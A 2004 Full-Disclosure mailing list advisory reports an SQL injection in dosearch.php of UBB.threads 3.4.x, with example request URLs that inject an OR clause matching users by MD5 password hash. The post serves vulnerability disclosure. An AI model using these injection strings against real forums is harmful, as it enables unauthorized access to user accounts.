[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] SQL Injection in UBB.threads 3.4.x

To: <bugs@xxxxxxxxxxxxxxxxxxx>
Subject: [Full-Disclosure] SQL Injection in UBB.threads 3.4.x
From: "Florian Rock" <florianrock@xxxxxx>
Date: Thu, 21 Oct 2004 22:35:24 +0200

Product:
========
UBB.threads

Vendor:
=======
UBBCentral (http://www.ubbcentral.com/)

Versions: ========= I tested it successfull on 3.4.x At Version 3.5 you need to be logged in to perform a search. I didnt tested this version.

Problem:
========
Sql-Injection in dosearch.php
dosearch.php?Name=' OR U_Password='PWINMD5

Impact:
=======
A remote user can inject SQL commands

Example:
========
db5c82346d770f48bdd8929094c0c695 (ubbpass)

/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695
OR
/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695'/*
-> selects a user who got "ubbpass" as password.

Greets fly out to:
==================
felx, zodiac, nostalg1c, chris, lexxor, haggi, li, xlr, rest of p32,
peti, danjo, milch_trinker, hecky, and all i forgot

Greets Florian Rock aka Remoter

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: Re: [Full-Disclosure] Will a vote for John Kerry be counted by aHartInterCivic eSlate3000 in Honolulu? - OT
Next by Date: Re: [in] Re: [Full-Disclosure] Will a vote for John Kerry be counted by a Hart InterCivic eSlate3000 in Honolulu?
Previous by thread: [Full-Disclosure] MDKSA-2004:110 - Updated gaim packages fix vulnerabilities
Next by thread: [Full-Disclosure] [HV-LOW] Unsafe WAV header handling can cause DoS on Windows
Index(es):
- Date
- Thread